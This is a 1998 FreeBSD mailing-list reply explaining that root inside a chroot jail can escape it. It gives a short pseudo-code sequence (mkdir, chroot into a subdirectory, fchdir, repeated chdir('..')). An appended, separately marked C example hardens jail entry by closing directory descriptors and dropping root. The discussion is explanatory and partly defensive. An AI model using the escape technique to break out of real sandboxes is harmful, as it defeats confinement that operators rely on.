Date:      Tue, 17 Nov 1998 12:54:19 +0100
From:      Eivind Eklund <eivind@yes.no>
To:        Mike Smith <mike@smith.net.au>, Harold Gutch <logix@foobar.franken.de>
Cc:        zhihuizhang <bf20761@binghamton.edu>, hackers <freebsd-hackers@FreeBSD.ORG>
Subject:   Re: Question on chroot()
Message-ID:  <19981117125419.28799@follo.net>
In-Reply-To: <199811152056.MAA14163@dingo.cdrom.com>; from Mike Smith on Sun, Nov 15, 1998 at 12:56:03PM -0800
References:  <19981115200813.B12524@foobar.franken.de> <199811152056.MAA14163@dingo.cdrom.com>

On Sun, Nov 15, 1998 at 12:56:03PM -0800, Mike Smith wrote:
> > On Sun, Nov 15, 1998 at 09:56:32AM -0800, Mike Smith wrote:
> > > Breaking out of a chroot'ed environment is less easy if you're not 
> > > root
> > Is this meant to be read as "more or less impossible", that is,
> > impossible unless the user can become root first (due to insecure
> > suid-root binaries in the chroot-environment etc.), or can users
> > really break out in more or less every situation (of course
> > assuming stuff like that they don't have any open filehandles
> > pointing to the outside in the beginning).
> 
> It's quite difficult to break out of a chroot'ed environment, yes, and 
> it's intended to be impossible, so obviously you can only get out 
> through flaws in the implementation...

It is easy if you have root privileges inside the "jail".

	/* pseudo-code */
	mkdir("mybreakdir", 0700);
	breakfd = open(".", 0, 0);
	chroot("mybreakdir");
	fchdir(breakfd);
	for (i=0; i<1000; i++)
		chdir("..");
	chroot(".");

I'm not sure if you need the fchdir(); chroot() is not supposed to
affect your current directory.  I don't think anybody has fixed the
above problem; it seems quite difficult to fix (you have to know which
FDs are inside and outside the jail, which is non-trivial).

Eivind.
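
A defensive counterpart to the point made in this message, added here as an example and not part of the original e-mail or of FreeBSD's code: since the escape depends on holding root inside the jail and on a directory reference outside the new root, a process entering a jail can close directory descriptors, change into the jail before calling chroot(), and then give up root for good. The names `jail_enter`, `count_dir_fds`, `close_dir_fds` and `FD_SCAN_MAX` are hypothetical.

```c
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define FD_SCAN_MAX 65536   /* assumed scan cap; raise it if your fd limit is higher */

/* Count (and optionally close) open descriptors >= minfd that are directories. */
static int scan_dir_fds(int minfd, int do_close)
{
    struct stat st;
    int n = 0;
    for (int fd = minfd; fd < FD_SCAN_MAX; fd++) {
        if (fstat(fd, &st) != 0 || !S_ISDIR(st.st_mode))
            continue;                       /* not open, or not a directory */
        n++;
        if (do_close)
            close(fd);
    }
    return n;
}
int count_dir_fds(int minfd) { return scan_dir_fds(minfd, 0); }
int close_dir_fds(int minfd) { return scan_dir_fds(minfd, 1); }

/* Enter the jail at `root` and drop to uid/gid. Returns 0 on success, -1 on failure. */
int jail_enter(const char *root, uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0) return -1;    /* never stay root inside the jail */
    close_dir_fds(3);                       /* no directory handles from outside */
    if (chdir(root) != 0) return -1;        /* cwd must be inside the new root */
    if (chroot(".") != 0) return -1;        /* requires root */
    if (chdir("/") != 0) return -1;
    if (setgroups(1, &gid) != 0) return -1; /* drop supplementary groups first */
    if (setgid(gid) != 0 || setuid(uid) != 0) return -1;
    if (setuid(0) == 0) return -1;          /* regaining root must fail */
    return 0;
}

int main(void)
{
    int fd = open(".", O_RDONLY);           /* constructed leak for the demo */
    printf("directory fds open: %d\n", count_dir_fds(3));
    printf("closed: %d, remaining: %d\n", close_dir_fds(3), count_dir_fds(3));
    return fd < 0;
}
```

The caller must treat a -1 from `jail_enter` as fatal and exit, because the process may be left partly confined and still privileged.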
